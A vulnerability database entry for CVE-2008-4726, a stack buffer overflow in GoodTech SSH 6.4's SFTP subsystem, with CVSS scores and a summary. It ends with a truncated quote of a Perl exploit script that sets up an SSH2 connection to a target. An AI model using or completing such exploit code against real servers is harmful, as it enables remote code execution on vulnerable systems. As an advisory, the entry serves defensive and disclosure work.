9
CVSSv2

CVE-2008-4726

Published: 24/10/2008 Updated: 11/10/2018
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in the SFTP subsystem in GoodTech SSH 6.4 allows remote authenticated users to execute arbitrary code via a long string to the (1) open (aka SSH_FXP_OPEN), (2) unlink, (3) opendir, and other unspecified parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

goodtechsystems goodtech ssh 6.4

Exploits

# GoodTech SSH Remote Buffer Overflow Exploit # Written by r0ut3r - writ3r [at] gmailcom # # SSH_FXP_OPEN command contains a buffer oveflow # # All other operations are also vulnerable, opendir, unlink, etc # # 0day for 2 months :) use Net::SSH2; my $user = "root"; my $pass = "yahh"; my $ip = "127001"; my $port = 22; my $ssh2 = Net::SSH2- ...